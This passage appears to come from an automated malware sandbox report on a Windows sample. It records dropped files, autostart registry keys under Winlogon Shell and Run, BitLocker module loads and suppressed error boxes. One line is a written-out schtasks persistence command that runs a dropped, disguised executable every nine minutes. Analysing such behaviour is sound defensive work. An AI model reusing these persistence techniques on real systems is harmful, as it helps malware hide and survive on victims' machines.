                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile created: C:\Users\user\Desktop\kTYwyifI.logJump to dropped file
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile created: C:\Users\user\Desktop\alFgOGaa.logJump to dropped file
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile created: C:\Users\user\Desktop\SHwrfMKt.logJump to dropped file
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile created: C:\Users\user\Desktop\Qxaqfufs.logJump to dropped file
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile created: C:\Users\user\Desktop\GOHavRZK.logJump to dropped file
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile created: C:\Users\user\Desktop\qMBWbOkw.logJump to dropped file
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile created: C:\Users\user\Desktop\ZndYtGLf.logJump to dropped file

                                    Boot Survival

                                    barindex
                                    Creates an undocumented autostart registry key
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Creates multiple autostart registry keys
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemSettingsJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinPerfcommonJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wnSgpBKJabSHvDawwFjyhiOtGEGVtaJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OfficeClickToRunJump to behavior
                                    Drops PE files to the user root directory
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeFile created: C:\Users\user\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeJump to dropped file
                                    Uses schtasks.exe or at.exe to add and modify task schedules
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\WmiPrvSE.exe'" /f
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OfficeClickToRunJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OfficeClickToRunJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wnSgpBKJabSHvDawwFjyhiOtGEGVtaJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wnSgpBKJabSHvDawwFjyhiOtGEGVtaJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wnSgpBKJabSHvDawwFjyhiOtGEGVtaJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wnSgpBKJabSHvDawwFjyhiOtGEGVtaJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemSettingsJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemSettingsJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemSettingsJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemSettingsJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinPerfcommonJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinPerfcommonJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinPerfcommonJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinPerfcommonJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wnSgpBKJabSHvDawwFjyhiOtGEGVtaJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wnSgpBKJabSHvDawwFjyhiOtGEGVtaJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wnSgpBKJabSHvDawwFjyhiOtGEGVtaJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wnSgpBKJabSHvDawwFjyhiOtGEGVtaJump to behavior

                                    Hooking and other Techniques for Hiding and Protection

                                    barindex
                                    Loading BitLocker PowerShell Module
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Users\user\Desktop\top.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\msproviderBrokerMonitornet\WinPerfcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\wnSgpBKJabSHvDawwFjyhiOtGEGVta.exeProcess information set: NOOPENFILEERRORBOX
